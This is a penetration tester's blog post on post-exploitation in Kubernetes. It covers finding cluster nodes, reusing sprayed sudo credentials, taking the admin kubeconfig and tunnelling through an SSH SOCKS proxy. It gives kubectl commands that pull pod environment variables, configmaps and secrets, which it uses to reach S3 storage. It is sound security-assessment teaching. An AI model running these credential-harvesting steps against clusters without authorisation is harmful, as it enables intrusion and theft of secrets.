Skip to main content
  1. Blog/

Accessing services through Kubernetes

·4 mins·

Security assessment experts often encounter a situation where they have already gained access to the infrastructure during a pentest, but it’s unclear what interesting things are present in that infrastructure.

Since many use Kubernetes to deploy services, K8s clusters can be one of the interesting targets. But they still need to be found and understood.

One way to detect nodes is to find hosts that use an SSL certificate with a common name Kubernetes Ingress Controller Fake Certificate. For example, this can be done using an nmap script ssl-cert.

On one of the projects, we found 47 nodes using this method. And based on some hostnames and subnets, we concluded that there is more than one cluster. But how can we determine which services are running in these clusters?

Thanks to the use of one place to collect all the information, we found out that we already have user credentials with sudo privileges on these hosts after a successful Password Spray attack.

In the /etc/kubernetes/ directory on the master node, there was a configuration not only for the node itself but also for the cluster administrator, which allowed us to save time on privilege escalation.

Since the Kubernetes API was only accessible on the localhost of the master node, we used the -D option when connecting to the node via SSH, and with the cluster administrator configuration, we gained full access to the API.

Then, we gathered all the necessary information about the K8s cluster, adding an option to ignore the untrusted certificate and an environment variable to work through a proxy:

export KUBECONFIG=~/admin.conf
HTTPS_PROXY=socks5://127.0.0.1:1080 kubectl --insecure-skip-tls-verify=true cluster-info

The list of nodes will help evaluate the size of the cluster and note the hosts that belong to it:

kubectl get nodes -o wide

By namespace names, you can try to understand which services are running in the cluster (e.g., minio or keycloak):

kubectl get namespaces

For getting full pod configurations, you can use output in YAML format. From the result of the command, you can get a list of pods, information about which images are used by containers, which ports services are listening on, and what is mounted in the pod’s file system. Often, from the environment variables passed to the container, you can get credentials or useful service configuration parameters. The -A parameter for the command will allow you to get information for all namespaces at once:

kubectl get pods -A -o yaml

In the list of ingresses, you can see the names of virtual hosts and traffic routing rules (at the L7 level):

kubectl get ingress -A

Example output:

NAMESPACE  NAME  CLASS  HOSTS      ADDRESS    PORTS
minio    minio  nginx  s3.domain.local  10.10.10.10  80,  443

ConfigMaps are designed to store settings in the form of key-value pairs. Although it is not recommended to store credentials, keys, and similar settings in them, they are still encountered. And also scripts, coredns settings, and other configuration files. Therefore, let’s take a look:

kubectl get configmaps -A -o yaml

We don’t collect all secrets, but only get a list. If we see by pod configurations or by secret name that a secret value is used, we get only that value:

kubectl get secrets -A
kubectl get secret -n <namespace> <secret_name>

If we discovered a virtual host in the list of ingresses, and when accessing it, we get a 404 error, we can look at the nginx logs (for each ingress-nginx-controller pod):

kubectl get logs -n ingress-nginx ingress-nginx-controller-<id>

Analyzing the obtained information, we can gain access to services. For example, we found in the pod configuration that values from the minio secret are used to access the S3 storage on the node minio.minio.svc.cluster.local. And in the list of ingresses, we saw that the virtual host s3.domain.local is available on the host 10.10.10.10, and incoming traffic on port 443/TCP is redirected to the minio pod in the minio namespace. Using the secret values, we gained access to the contents of the S3 storage buckets and implemented one of the business risks.

Related